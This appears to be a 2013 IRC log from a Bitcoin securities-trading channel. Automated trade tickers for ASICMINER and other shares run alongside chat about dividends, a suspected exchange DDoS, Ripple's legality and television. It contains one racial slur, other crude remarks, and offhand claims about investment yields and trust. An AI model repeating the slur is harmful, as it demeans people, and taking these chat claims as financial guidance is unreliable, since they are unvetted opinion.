0.027001 = 0.27 BTC [-] May 22 17:13:05 [MPEX] [S.MPOE] 13597 @ 0.00067199 = 9.137 BTC [+] May 22 17:13:20 [BTCTC] [ASICMINER-PT] 1 @ 2.668997 BTC [+] May 22 17:13:58 [BTCTC] [TAT.ASICMINER] 4 @ 0.027001 = 0.108 BTC [-] May 22 17:14:01 [HAVELOCK] [ASICM] 4 @ 0.02739501 = 0.1096 BTC [-] May 22 17:14:02 [HAVELOCK] [ASICM] 46 @ 0.027395 = 1.2602 BTC [-] May 22 17:15:21 [BTCTC] [ASICMINER-PT] 1 @ 2.668998 BTC [+] May 22 17:17:24 [BTCTC] [BASIC-MINING] 1 @ 0.54 BTC [+] May 22 17:18:02 [HAVELOCK] [ASICM] 33 @ 0.027395 = 0.904 BTC [-] May 22 17:18:03 [HAVELOCK] [ASICM] 28 @ 0.0266001 = 0.7448 BTC [-] May 22 17:18:04 [HAVELOCK] [ASICM] 289 @ 0.02660001 = 7.6874 BTC [-] May 22 17:19:30 [BTCTC] [ASICMINER-PT] 1 @ 2.5933 BTC [-] May 22 17:20:29 I am always on the look out for funds to invest my funds money in. May 22 17:20:33 [BTCTC] [ASICMINER-PT] 1 @ 2.5952 BTC [+] May 22 17:20:35 these worlds will be famous May 22 17:21:14 [BTCTC] [ASICMINER-PT] 1 @ 2.593201 BTC [-] May 22 17:21:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.0278 BTC [+] May 22 17:21:47 [BTCTC] [ASICMINER-PT] 1 @ 2.669 BTC [+] May 22 17:21:48 wat May 22 17:22:14 wat(tm) and the wat(tm) logo are registered trademarks May 22 17:22:28 wat May 22 17:22:30 [BTCTC] [ASICMINER-PT] 1 @ 2.590001 BTC [-] May 22 17:22:34 [BTCTC] [ASICMINER-PT] 1 @ 2.6765 BTC [+] May 22 17:23:01 [HAVELOCK] [ASICM] 69 @ 0.0275 = 1.8975 BTC [+] May 22 17:23:28 [BTCTC] [ASICMINER-PT] 1 @ 2.676699 BTC [+] May 22 17:23:54 [BTCTC] [ASICMINER-PT] 5 @ 2.6767 = 13.3835 BTC [+] May 22 17:24:01 [HAVELOCK] [ASICM] 36 @ 0.0275 = 0.99 BTC [+] May 22 17:25:43 [MPEX] [S.DICE] 565 @ 0.00252 = 1.4238 BTC [+] May 22 17:25:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.0278 BTC [+] May 22 17:28:01 [HAVELOCK] [ASICM] 28 @ 0.027499 = 0.77 BTC [-] May 22 17:29:01 [HAVELOCK] [ASICM] 99 @ 0.0267 = 2.6433 BTC [-] May 22 17:30:02 [HAVELOCK] [ASICM] 8 @ 0.0267 = 0.2136 BTC [-] May 22 17:32:01 [HAVELOCK] [VTX] 3 @ 0.42 = 1.26 BTC [+] May 22 17:32:51 [BTCTC] [GSDPT] 2 @ 0.00284 = 0.0057 BTC [+] May 22 17:33:10 lol, like i asked just few days before glbse closing "what do all these glbse funds invest into? other glbse funds?" May 22 17:34:00 [HAVELOCK] [ASICM] 1 @ 0.0275 BTC [+] May 22 17:34:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.026 BTC [-] May 22 17:34:58 [BTCTC] [TAT.ASICMINER] 24 @ 0.026 = 0.624 BTC [-] May 22 17:35:01 [HAVELOCK] [ASICM] 1 @ 0.0274 BTC [-] May 22 17:35:37 [BTCTC] [BASIC-MINING] 5 @ 0.54 = 2.7 BTC [+] May 22 17:36:15 AM dividend = 0.02084164 May 22 17:36:55 [BTCTC] [ASICMINER-PT] 1 @ 2.61 BTC [-] May 22 17:38:28 deathandtaxes can be trusted right? May 22 17:39:01 [HAVELOCK] [HIM] 1 @ 2.3899 BTC [-] May 22 17:39:03 [HAVELOCK] [HIM] 1 @ 2.38999 BTC [+] May 22 17:40:01 [HAVELOCK] [ASICM] 6 @ 0.02660001 = 0.1596 BTC [-] May 22 17:40:03 [HAVELOCK] [ASICM] 5 @ 0.0265 = 0.1325 BTC [-] May 22 17:40:04 [HAVELOCK] [ASICM] 30 @ 0.02615 = 0.7845 BTC [-] May 22 17:40:05 [HAVELOCK] [ASICM] 9 @ 0.02615 = 0.2354 BTC [-] May 22 17:40:05 [HAVELOCK] [ASICM] 10 @ 0.026 = 0.26 BTC [-] May 22 17:40:25 [BTCTC] [ASICMINER-PT] 1 @ 2.592 BTC [-] May 22 17:40:34 [BTCTC] [ASICMINER-PT] 1 @ 2.590001 BTC [-] May 22 17:40:48 [BTCTC] [ASICMINER-PT] 2 @ 2.59 = 5.18 BTC [-] May 22 17:41:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.0269 BTC [+] May 22 17:42:02 [HAVELOCK] [ASICM] 87 @ 0.0273 = 2.3751 BTC [+] May 22 17:42:23 [BTCTC] [ASICMINER-PT] 1 @ 2.6 BTC [+] May 22 17:43:31 ddos? May 22 17:46:12 [MPEX] [S.MPOE] 7400 @ 0.00067054 = 4.962 BTC [-] May 22 17:46:14 everything working for me May 22 17:46:29 was down about 2hrs ago May 22 17:47:02 ThickAsThieves: where were AM divs announced? May 22 17:48:36 [BTCTC] [RSM] 1 @ 0.012632 BTC [+] May 22 17:48:49 [BTCTC] [ASICMINER-PT] 1 @ 2.669999 BTC [+] May 22 17:48:51 they are sent through the block chain May 22 17:48:52 [BTCTC] [ASICMINER-PT] 1 @ 2.676697 BTC [+] May 22 17:48:52 in the main AM thread May 22 17:49:03 [BTCTC] [ASICMINER-PT] 1 @ 2.676698 BTC [+] May 22 17:49:04 very easy to find May 22 17:49:05 but yes jborkl is correct May 22 17:49:15 [BTCTC] [TAT.ASICMINER] 47 @ 0.0269 = 1.2643 BTC [+] May 22 17:49:37 oh shit May 22 17:49:41 how long before they are issued on the PTs usually? May 22 17:49:47 its AM div time May 22 17:49:57 i own both ASICMINER-PT and TAT.ASICMINER on btct May 22 17:50:23 you'll need to wait til they clear from friedcat, and then clear into the PT operator accounts May 22 17:50:37 I don't have enough spare BTC to pay out super early this time May 22 17:50:54 not in a hurry, just curious May 22 17:51:04 [BTCTC] [TAT.ASICMINER] 18 @ 0.0269 = 0.4842 BTC [+] May 22 17:51:20 fiat500: at the very minimum, 12 blocks after friedcat actually sends the divs May 22 17:51:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.0269 BTC [+] May 22 17:51:40 ok cool May 22 17:51:46 thanks guys May 22 17:54:01 [HAVELOCK] [ASICM] 36 @ 0.0267 = 0.9612 BTC [-] May 22 17:55:01 [HAVELOCK] [ASICM] 1 @ 0.0267 BTC [-] May 22 17:55:32 [BTCTC] [TAT.ASICMINER] 19 @ 0.0262 = 0.4978 BTC [-] May 22 17:55:46 [BTCTC] [ASICMINER-PT] 1 @ 2.659999 BTC [-] May 22 17:55:49 [MPEX] [S.MPOE] 12053 @ 0.00067199 = 8.0995 BTC [+] May 22 17:55:51 [MPEX] [S.MPOE] 31450 @ 0.00067256 = 21.152 BTC [+] May 22 17:56:53 low asicminer div payout May 22 17:57:06 expecting huge selloffs from newbs since divs have been paid to PT May 22 17:57:13 when* May 22 17:57:38 eh maybe May 22 17:57:51 still 40% yield at 2.7 May 22 17:57:55 yearly May 22 17:58:03 its still very high May 22 17:58:14 maybe even unrealistically high May 22 17:59:01 [HAVELOCK] [VTX] 2 @ 0.411221 = 0.8224 BTC [-] May 22 17:59:02 [HAVELOCK] [VTX] 2 @ 0.41122 = 0.8224 BTC [-] May 22 18:00:22 Friedcat: "Some of the sales are yet to be finalized, therefore should be counted in the next week's income." May 22 18:00:59 way to lead 'em FC May 22 18:01:08 [BTCTC] [ASICMINER-PT] 2 @ 2.676696 = 5.3534 BTC [+] May 22 18:03:20 [BTCTC] [ASICMINER-PT] 3 @ 2.676696 = 8.0301 BTC [+] May 22 18:03:24 [BTCTC] [TAT.ASICMINER] 3 @ 0.026899 = 0.0807 BTC [+] May 22 18:04:32 still full derp i see May 22 18:05:01 [HAVELOCK] [ASICM] 9 @ 0.026 = 0.234 BTC [-] May 22 18:05:02 [HAVELOCK] [ASICM] 81 @ 0.026 = 2.106 BTC [-] May 22 18:05:09 ThickAsThieves: hhhhhehe May 22 18:05:29 http://24.media.tumblr.com/365047a6f36d8e6949bb9444fe9ed50d/tumblr_mguhnvoByV1rd2ff1o1_500.jpg May 22 18:08:18 [BTCTC] [TAT.ASICMINER] 150 @ 0.026 = 3.9 BTC [-] May 22 18:08:39 brain fart May 22 18:09:21 fiat500, I prefer http://www.youtube.com/watch?v=OPcod8IS214 May 22 18:10:38 senior moment May 22 18:11:41 esprit d'escalier? May 22 18:12:32 spirit of the stairway May 22 18:12:58 a French term used in English that describes the predicament of thinking of the perfect comeback too late May 22 18:13:44 that was the other ddos May 22 18:13:47 LOL May 22 18:13:54 the code was actually in ltcglobal May 22 18:13:57 thanks Chaang-Noi May 22 18:13:58 where he was testing first May 22 18:14:02 was wondering about that May 22 18:15:40 yeah May 22 18:15:58 especially when you can be fairly confident itll be higher next week May 22 18:16:46 ;;tslb May 22 18:16:51 Time since last block: 1 hour, 9 minutes, and 1 second May 22 18:16:57 bleh May 22 18:17:05 ;;nethash May 22 18:17:08 83865.9622146 May 22 18:17:11 nice! May 22 18:17:22 ;;estimate May 22 18:17:23 Next difficulty estimate | 11906510.9867 based on data since last change | 11715760.8068 based on data for last three days May 22 18:17:42 ;;bc,stats May 22 18:17:43 Current Blocks: 237372 | Current Difficulty: 1.1187257461360792E7 | Next Difficulty At Block: 237887 | Next Difficulty In: 515 blocks | Next Difficulty In About: 3 days, 4 hours, 17 minutes, and 46 seconds | Next Difficulty Estimate: 11906510.9867 | Estimated Percent Change: 6.42922 May 22 18:18:16 that is wrong, we are on block 237378 May 22 18:18:43 fukn blockchain.info May 22 18:18:48 yea May 22 18:18:52 maybe gribble should use a diff source May 22 18:18:52 weird May 22 18:19:03 ;;gribble cmon now May 22 18:19:04 yes I am gribble. why do you keep bothering me? May 22 18:19:04 I need to upgrade bitcoind May 22 18:19:05 ugh May 22 18:19:09 just run your own bitcoind May 22 18:19:18 it is always up to date May 22 18:19:22 what's the command to see block height in bitcoind May 22 18:19:49 well, if you run -qt you can just mouse over the check mark May 22 18:20:10 gribble & assbot are our bitches, if we let them misbehave they'll start learning how to read and then what? May 22 18:22:02 [HAVELOCK] [ASICM] 10 @ 0.0274 = 0.274 BTC [+] May 22 18:22:31 Skynet May 22 18:23:06 exactly May 22 18:23:18 maybe even Battlestar Galactica May 22 18:25:42 [MPEX] [S.MPOE] 20151 @ 0.00067431 = 13.588 BTC [+] May 22 18:26:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.026899 BTC [+] May 22 18:27:01 [HAVELOCK] [ASICM] 44 @ 0.0269 = 1.1836 BTC [-] May 22 18:27:02 [HAVELOCK] [ASICM] 43 @ 0.0269 = 1.1567 BTC [-] May 22 18:30:01 [HAVELOCK] [ASICM] 1 @ 0.0267 BTC [-] May 22 18:31:10 [BTCTC] [ASICMINER-PT] 1 @ 2.671 BTC [-] May 22 18:34:45 [BTCTC] [TAT.ASICMINER] 36 @ 0.026899 = 0.9684 BTC [+] May 22 18:34:49 [BTCTC] [TAT.ASICMINER] 19 @ 0.026899 = 0.5111 BTC [+] May 22 18:35:18 [BTCTC] [ASICMINER-PT] 1 @ 2.67 BTC [-] May 22 18:36:07 [BTCTC] [ASICMINER-PT] 1 @ 2.67 BTC [-] May 22 18:36:25 [BTCTC] [TAT.ASICMINER] 5 @ 0.026899 = 0.1345 BTC [+] May 22 18:39:53 Hello May 22 18:39:59 [BTCTC] [TAT.ASICMINER] 17 @ 0.02709 = 0.4605 BTC [+] May 22 18:40:46 [BTCTC] [ASICMINER-PT] 1 @ 2.671 BTC [+] May 22 18:42:08 truffles: i wasnt May 22 18:42:12 caprica was terrible >_> May 22 18:42:21 i hated the main character May 22 18:42:29 blood and chrome is hot tho May 22 18:42:40 whatever her name was, really annoying May 22 18:42:52 her friends and all the religious crap May 22 18:42:52 ugh May 22 18:43:28 hm? i dont May 22 18:43:30 [MPEX] [S.MPOE] 12199 @ 0.00067431 = 8.2259 BTC [+] May 22 18:43:32 [MPEX] [S.MPOE] 7951 @ 0.00067481 = 5.3654 BTC [+] May 22 18:43:45 i just thought it was awful May 22 18:44:26 have you seen blood and chrome? May 22 18:44:29 Sup? May 22 18:44:51 oh man, you must May 22 18:44:55 no its BSG lol May 22 18:45:00 miniseries though :( May 22 18:45:18 http://en.wikipedia.org/wiki/Battlestar_Galactica:_Blood_%26_Chrome May 22 18:45:49 i liked BSG til the last season or so May 22 18:45:56 I liked Caprica May 22 18:46:06 i kinda loved the ending May 22 18:46:09 mind=blown May 22 18:46:29 i was expecting some feelgood horseshit, but they managed to surprise me May 22 18:47:32 i found it funny how the adamas were basically italian mobsters May 22 18:47:52 [BTCTC] [ASICMINER-PT] 8 @ 2.671 = 21.368 BTC [+] May 22 18:47:55 [BTCTC] [ASICMINER-PT] 4 @ 2.671 = 10.684 BTC [+] May 22 18:47:58 setting: 1910's earth May 22 18:48:26 i need some advice from you guys May 22 18:49:00 im building a btc service with a friend May 22 18:49:20 got things covered on the technical side, but what im worried about is the whole trust angle May 22 18:49:34 how do people manage that usually May 22 18:49:43 [BTCTC] [ASICMINER-PT] 3 @ 2.676698 = 8.0301 BTC [+] May 22 18:49:54 not particularly, but other people do May 22 18:50:04 i mean May 22 18:50:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.025802 BTC [-] May 22 18:50:20 i will basically be asking people to trust me with their coins May 22 18:50:29 tall order, i havent been around for very long May 22 18:50:42 but im not interested in waiting and playing games and trying to make a name for myself on btctalk either May 22 18:50:49 you cant prove a negative >_> May 22 18:51:01 [HAVELOCK] [ASICM] 59 @ 0.026 = 1.534 BTC [-] May 22 18:51:23 what are you doing fiat500? i might be intrested May 22 18:51:36 fiat500, do you mean you dont trust the friend, or that you need investors, or? May 22 18:51:45 ThickAsThieves: dont need funding or anything May 22 18:52:09 [BTCTC] [ASICMINER-PT] 4 @ 2.676698 = 10.7068 BTC [+] May 22 18:52:11 its just a question of, people will (hopefully) be storing their coins with us May 22 18:52:16 [BTCTC] [ASICMINER-PT] 5 @ 2.6767 = 13.3835 BTC [+] May 22 18:52:21 and doing things with them May 22 18:52:22 [BTCTC] [ASICMINER-PT] 1 @ 2.697 BTC [+] May 22 18:52:39 that usually ends in tears May 22 18:52:39 3rd party idea is interesting, sort of like extended escrow May 22 18:52:40 [BTCTC] [ASICMINER-PT] 1 @ 2.697999 BTC [+] May 22 18:52:42 start small? May 22 18:52:53 ThickAsThieves: like, put upper limits? May 22 18:53:07 i store coins for mainstream clients atm, but i only store them, i don't gamble them or anything like an investment bank would May 22 18:53:15 LOL May 22 18:53:25 BitHub: how much do you charge for that service? May 22 18:53:35 .5 btc a year May 22 18:54:02 what happens if you get hit by a horse-drawn carriage May 22 18:54:29 kakobrekla: hi there May 22 18:54:31 i have partners to carry out the death plan May 22 18:54:35 lol May 22 18:54:38 morbid May 22 18:54:39 sup mjr_ May 22 18:54:52 things would be sad at BitHub for a while but BitHub will continue without me May 22 18:54:53 so escrow storage, start small, any other tips? May 22 18:55:06 start with friends and family first May 22 18:55:14 [BTCTC] [TAT.ASICMINER] 75 @ 0.027087 = 2.0315 BTC [+] May 22 18:55:38 Dividends for TAT.ASICMINER have been paid for BTCT & BitFunder shareholders May 22 18:55:40 kakobrekla: would you be an introducing broker for another firm as well? May 22 18:56:03 well thats a broad question... lets take it on pm May 22 18:56:15 but trust don't erally mean anything look at ziggap May 22 18:56:58 client is either going to trust you or not, and that takes time, but even someone 5 years in the game can rip you off or do a runner oneday May 22 18:57:03 so got to keep that in mind May 22 18:57:36 [BTCTC] [TAT.ASICMINER] 6 @ 0.026 = 0.156 BTC [-] May 22 18:57:57 ThickAsThieves: How much per unit? May 22 18:58:06 .000198 May 22 18:58:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.027086 BTC [+] May 22 18:58:44 Not too bad. May 22 18:58:54 anyone wanna take bets on how long before the first shareholders asks me why they are lower this week? May 22 18:59:08 1-5mins May 22 18:59:32 good time to cause a panic dumping with teh recent AM newbs May 22 18:59:49 Rioters have lit fires and stoned emergency services in the suburbs of Stockholm for the third night in a row after a man was shot dead by police. May 22 18:59:55 Block difficulty? May 22 19:00:05 Is that why? May 22 19:00:06 and asicminer share price div being low mp May 22 19:00:06 :) May 22 19:00:10 https://www.youtube.com/watch?v=ve7gsfBootk <<< 15 secs in and I hate May 22 19:00:11 it May 22 19:00:28 [BTCTC] [S.MPOE-PT] 2 @ 0.000646 = 0.0013 BTC [-] May 22 19:00:47 wigger girls? May 22 19:02:55 Is every share enititled to a certain percentage of the total dividends, or does it depend on the nummber of shares issued? May 22 19:03:26 [BTCTC] [BITVPS] 2 @ 0.00075 = 0.0015 BTC [-] May 22 19:03:36 [BTCTC] [BASIC-MINING] 5 @ 0.54 = 2.7 BTC [+] May 22 19:04:16 every share is equal May 22 19:05:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.02 BTC [-] May 22 19:05:15 So they all get a cetain percentage of the total? May 22 19:05:17 Wow. May 22 19:05:25 0.02 May 22 19:06:07 there are 400,000 total shares May 22 19:06:11 that will never change May 22 19:06:14 well May 22 19:06:22 we are told it will never change May 22 19:07:04 [BTCTC] [RSM] 1 @ 0.012497 BTC [-] May 22 19:07:24 I see. May 22 19:08:02 So why does the btctc div page show a number of shares, a total and an amount per share? May 22 19:08:38 why shouldnt it? May 22 19:08:51 [BTCTC] [ASICMINER-PT] 1 @ 2.694999 BTC [-] May 22 19:09:11 well presumably because only a variable fraction of the ttoal is passthrough't there May 22 19:09:37 incidentally, am i the only one who thinks it's pretty hysterical that idiots like goat used to dismiss the sour grapes mpex as "only having three shares" May 22 19:09:47 Oh right. May 22 19:09:50 [BTCTC] [TAT.ASICMINER] 25 @ 0.0265 = 0.6625 BTC [+] May 22 19:09:55 whereby the situation now is that there's three exchanges with one share between them ? May 22 19:09:58 I kinda get that. May 22 19:10:01 [HAVELOCK] [ASICM] 2 @ 0.026 = 0.052 BTC [-] May 22 19:10:34 Well I thought there will always be 400 000 May 22 19:10:39 [BTCTC] [S.MPOE-PT] 12 @ 0.000666 = 0.008 BTC [+] May 22 19:10:50 [BTCTC] [TAT.ASICMINER] 29 @ 0.025802 = 0.7483 BTC [-] May 22 19:10:50 well, some exchanges have two or 3 passtroughs May 22 19:10:54 [BTCTC] [TAT.ASICMINER] 10 @ 0.025802 = 0.258 BTC [-] May 22 19:10:59 Uhuh. May 22 19:11:04 so that counts for even more lols May 22 19:11:14 i guess it does May 22 19:11:29 [BTCTC] [TAT.ASICMINER] 35 @ 0.025801 = 0.903 BTC [-] May 22 19:11:58 btctc - has the main PT, the micro PT and a pending PT May 22 19:12:16 ;;later tell davout https://bitcointalk.org/index.php?topic=212761.msg2234209#msg2234209 you're a legend now May 22 19:12:17 The operation succeeded. May 22 19:12:27 and I have seen a suggestion for a 1/1000 PT May 22 19:12:46 [BTCTC] [BITVPS] 1 @ 0.00075 BTC [-] May 22 19:12:47 Haha where? May 22 19:13:05 On btctc May 22 19:13:09 ? May 22 19:13:09 jborkl i just hope that everyone learns from ThickAsThieves' thing that indeed shares should be planned like mpex always did it (ye, 0.00x to 0.000x per) May 22 19:13:20 1/1000PT with 50% management fees May 22 19:13:22 rathr than the glbse method of x to 0.x May 22 19:13:47 after that all people need to learn is monthly rather than weekly dividends and we can hallelujah May 22 19:14:00 i received a letter in the mail from a settlement my deceased grandfather started May 22 19:14:07 the company is bankrupt May 22 19:14:07 Chaang-Noi: LOL May 22 19:14:21 but they can pay %19.7 of the claim May 22 19:14:31 jcpham so basically you're no longer a trust babieh ? May 22 19:14:41 the lawyer's office is offering 70% now May 22 19:14:51 or 50% now and 50% in two years May 22 19:14:58 in other news, proton ponzi : http://www.swpc.noaa.gov/ftpdir/plots/proton/20130522_proton.gif May 22 19:15:00 if funds are still available May 22 19:15:11 no 70% of %19.7 May 22 19:15:22 it's a joke May 22 19:15:29 these lawyers are all criminals May 22 19:15:32 Where is the 1/1000PT? May 22 19:15:52 i'll take the 70% because idgaf and it's free money May 22 19:15:54 proton pump and dump. >=10 MeV FTW May 22 19:16:01 but wtf May 22 19:16:28 i can only imagine some sweet old lady getting this letter May 22 19:16:38 about her dead husband that wroked ina mill for 30 years May 22 19:16:42 terrible May 22 19:17:17 it's a depressing read where they lay it all out how they have no money May 22 19:17:30 and the amount gets smaller as you read May 22 19:17:51 it's an asbestos thing May 22 19:17:56 dow corning and such May 22 19:18:16 guys working where they shouldn't May 22 19:18:40 my paternal lineage is welders. May 22 19:18:52 any type of metal working really May 22 19:19:09 my dad didn't know about the computers May 22 19:19:12 too old too dead May 22 19:19:51 burgeoning robot middle class May 22 19:19:59 [BTCTC] [ASICMINER-PT] 3 @ 2.685 = 8.055 BTC [-] May 22 19:21:22 [BTCTC] [ASICMINER-PT] 2 @ 2.685 = 5.37 BTC [-] May 22 19:23:25 [BTCTC] [ASICMINER-PT] 3 @ 2.625 = 7.875 BTC [-] May 22 19:24:01 [HAVELOCK] [VTX] 2 @ 0.41122 = 0.8224 BTC [-] May 22 19:25:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.026789 BTC [+] May 22 19:26:17 [BTCTC] [BITVPS] 1000 @ 0.00075 = 0.75 BTC [-] May 22 19:26:31 [BTCTC] [ASICMINER-PT] 2 @ 2.682 = 5.364 BTC [+] May 22 19:27:00 [HAVELOCK] [ASICM] 34 @ 0.026 = 0.884 BTC [-] May 22 19:27:04 [BTCTC] [ASICMINER-PT] 1 @ 2.688 BTC [+] May 22 19:27:06 w 51 May 22 19:27:51 [BTCTC] [ASICMINER-PT] 2 @ 2.685 = 5.37 BTC [-] May 22 19:28:00 [HAVELOCK] [ASICM] 60 @ 0.026 = 1.56 BTC [-] May 22 19:28:01 [HAVELOCK] [ASICM] 21 @ 0.026 = 0.546 BTC [-] May 22 19:28:02 [BTCTC] [ASICMINER-PT] 4 @ 2.695 = 10.78 BTC [+] May 22 19:28:03 [HAVELOCK] [ASICM] 24 @ 0.026 = 0.624 BTC [-] May 22 19:28:10 [BTCTC] [ASICMINER-PT] 27 @ 2.685 = 72.495 BTC [-] May 22 19:28:16 [BTCTC] [ASICMINER-PT] 2 @ 2.682 = 5.364 BTC [-] May 22 19:28:21 [BTCTC] [ASICMINER-PT] 1 @ 2.62 BTC [-] May 22 19:28:27 wow a rally May 22 19:28:30 didnt expact that May 22 19:28:32 [BTCTC] [ASICMINER-PT] 1 @ 2.601 BTC [-] May 22 19:28:42 [BTCTC] [ASICMINER-PT] 3 @ 2.60001 = 7.8 BTC [-] May 22 19:28:47 [BTCTC] [ASICMINER-PT] 1 @ 2.581 BTC [-] May 22 19:28:59 [BTCTC] [ASICMINER-PT] 1 @ 2.5802 BTC [-] May 22 19:29:04 or not May 22 19:29:05 hehe May 22 19:29:07 ThickAsThieves: divs aint been paid out yet May 22 19:29:17 [BTCTC] [ASICMINER-PT] 5 @ 2.57 = 12.85 BTC [-] May 22 19:29:37 nice dump goat May 22 19:29:56 [BTCTC] [ASICMINER-PT] 1 @ 2.562 BTC [-] May 22 19:30:01 [HAVELOCK] [ASICM] 71 @ 0.0266 = 1.8886 BTC [+] May 22 19:30:16 yeah this was big [12:28] <@assbot> [BTCTC] [ASICMINER-PT] 27 @ 2.685 = 72.495 BTC [-] May 22 19:31:00 [BTCTC] [ASICMINER-PT] 1 @ 2.551 BTC [-] May 22 19:32:19 [BTCTC] [ASICMINER-PT] 1 @ 2.551 BTC [-] May 22 19:32:25 [BTCTC] [TAT.ASICMINER] 2 @ 0.026699 = 0.0534 BTC [-] May 22 19:33:27 [BTCTC] [ASICMINER-PT] 1 @ 2.550001 BTC [-] May 22 19:34:10 BTCTC dying again May 22 19:35:09 [BTCTC] [ASICMINER-PT] 5 @ 2.55 = 12.75 BTC [-] May 22 19:38:02 [HAVELOCK] [ASICM] 17 @ 0.0276 = 0.4692 BTC [+] May 22 19:38:33 [MPEX] [S.MPOE] 8350 @ 0.00067481 = 5.6347 BTC [+] May 22 19:38:35 [BTCTC] [ASICMINER-PT] 1 @ 2.54 BTC [-] May 22 19:39:00 [HAVELOCK] [ASICM] 7 @ 0.0276 = 0.1932 BTC [+] May 22 19:40:01 [HAVELOCK] [VTX] 4 @ 0.4212 = 1.6848 BTC [+] May 22 19:41:45 <@Ukto> also,k with the legalities of ripple currently being the operator of an illegal exchange in the US, our lawyers have recommended getting away from ripple as fast as possible if we dont want ot be included in a DHS raid. :/ May 22 19:43:30 [BTCTC] [ASICMINER-PT] 1 @ 2.530002 BTC [-] May 22 19:43:53 [BTCTC] [COGNITIVE] 1 @ 0.249995 BTC [+] May 22 19:44:25 he's not talking about blockchain May 22 19:44:35 just ripple May 22 19:44:37 ripple runs the majority of the ripple servers May 22 19:44:39 i.e. control May 22 19:44:46 the source is not open May 22 19:45:00 thus, it is centralized May 22 19:45:06 i never tried to May 22 19:45:23 i got free ripple and sold it and feel good :) May 22 19:45:42 i am trying to place a buy right now on btct too and having issues May 22 19:45:47 I sold my 40k free ripples for like 5 BTC May 22 19:45:51 i left burnsy a pm about somet hings to try May 22 19:45:57 I'm quite satisfied with that May 22 19:46:02 but i think in the forums he said the trading timeout was due to the wallet issue May 22 19:47:24 Dividends for ASICM have also been paid. TAT Investments, putting your money to work faster! ;) May 22 19:47:30 I hate to sound nooby, but does my share of the profits decrease as more shares are issued. May 22 19:48:02 The ones on Havelock haven't been just yet. May 22 19:48:40 you already asked that dude May 22 19:49:07 [BTCTC] [COGNITIVE] 8 @ 0.249996 = 2 BTC [+] May 22 19:49:40 when you see new PT shares added, it only me moving shares from off market into the TAT PT May 22 19:49:55 they do not dilute dividends May 22 19:50:27 [BTCTC] [ASICMINER-PT] 1 @ 2.502 BTC [-] May 22 19:50:48 hehe May 22 19:50:55 there's more money to make by staying May 22 19:51:01 [HAVELOCK] [ASICM] 88 @ 0.02765 = 2.4332 BTC [+] May 22 19:52:01 [HAVELOCK] [VTX] 1 @ 0.4212 BTC [+] May 22 19:52:35 I still don't really understand, because from the div history, the dividend seems to be the total divided by the number of shares, which is not constant. May 22 19:53:02 Sorry for being a dumbass. May 22 19:53:15 the divs are paid per unit May 22 19:53:19 simple as that May 22 19:53:24 every unit gets the same amount May 22 19:53:31 every week May 22 19:53:38 the amount of units never changes May 22 19:53:50 to clarify May 22 19:54:00 every unit gets an EQUAL amount every week May 22 19:54:01 Ah so the total is calculated by BTC/Share times shares, not vice versa? May 22 19:54:04 yEAH May 22 19:54:20 just forget about totals May 22 19:54:29 Right. May 22 19:54:38 means nothing May 22 19:54:44 if you want to know the real total payout May 22 19:54:55 take 1 unit's divs X 400,000 May 22 19:55:01 [HAVELOCK] [ASICM] 1000 @ 0.0276 = 27.6 BTC [-] May 22 19:55:07 maybe if you pay the divs out on ASICMINER-PT they'll stop the DDOS? May 22 19:55:28 Also, is there any reason why last week's divs were abnormally high? May 22 19:55:39 [BTCTC] [COGNITIVE] 30 @ 0.249998 = 7.4999 BTC [+] May 22 19:55:47 [MPEX] [S.MPOE] 13599 @ 0.00067481 = 9.1767 BTC [+] May 22 19:55:49 [MPEX] [S.MPOE] 8450 @ 0.00067489 = 5.7028 BTC [+] May 22 19:56:01 [MPEX] [S.MPOE] 3793 @ 0.0006767 = 2.5667 BTC [+] May 22 19:56:02 [MPEX] [S.MPOE] 7681 @ 0.00067796 = 5.2074 BTC [+] May 22 19:56:23 Ah right. May 22 19:56:27 I has a sad. May 22 19:56:51 The asicminer usbs look interesting. May 22 19:56:52 pool luck ie variance, when blocks are found compared to the 120 confirms needed to payout, hardware sales , hold back for needed further hardware purchases, expenses incurred May 22 19:57:00 [HAVELOCK] [ASICM] 3 @ 0.0275 = 0.0825 BTC [-] May 22 19:57:01 [HAVELOCK] [ASICM] 1058 @ 0.0275 = 29.095 BTC [-] May 22 19:57:02 the list goes on and on May 22 19:57:17 Only 300 mhash/s so I doubt they pay off very quickly. May 22 19:58:00 [HAVELOCK] [ASICM] 300 @ 0.0275 = 8.25 BTC [-] May 22 19:58:01 [HAVELOCK] [ASICM] 3 @ 0.0275 = 0.0825 BTC [-] May 22 19:58:44 [BTCTC] [ASICMINER-PT] 1 @ 2.501 BTC [-] May 22 19:59:31 [BTCTC] [TAT.ASICMINER] 18 @ 0.026699 = 0.4806 BTC [-] May 22 20:01:01 [HAVELOCK] [ASICM] 1200 @ 0.0275 = 33 BTC [-] May 22 20:01:02 [HAVELOCK] [ASICM] 371 @ 0.0275 = 10.2025 BTC [-] May 22 20:03:01 [HAVELOCK] [ASICM] 15 @ 0.0272 = 0.408 BTC [-] May 22 20:04:01 [HAVELOCK] [ASICM] 1 @ 0.0272 BTC [-] May 22 20:05:01 [HAVELOCK] [ASICM] 5 @ 0.0272 = 0.136 BTC [-] May 22 20:05:01 [HAVELOCK] [ASICM] 1 @ 0.0272 BTC [-] May 22 20:05:07 I want one, but it probably isn't economical. May 22 20:05:23 i think some people reported it hashing higher May 22 20:05:26 but still May 22 20:05:29 pretty expensive May 22 20:05:44 did you guys see this post? https://bitcointalk.org/index.php?PHPSESSID=00nvu059e6oiajl03rfsoka4s2&topic=211298.msg2215507#msg2215507 May 22 20:05:47 ;;genrate 334 May 22 20:05:48 The expected generation output, at 334.0 Mhps, given difficulty of 11187257.4614, is 0.0150144731243 BTC per day and 0.000625603046845 BTC per hour. May 22 20:06:03 [BTCTC] [TAT.ASICMINER] 55 @ 0.026699 = 1.4684 BTC [-] May 22 20:06:32 Where can I get the USB miners? May 22 20:06:47 [BTCTC] [ASICMINER-PT] 5 @ 2.501 = 12.505 BTC [-] May 22 20:06:57 it's filled with "This user is currently ignored" :) May 22 20:07:00 [HAVELOCK] [ASICM] 88 @ 0.0272 = 2.3936 BTC [-] 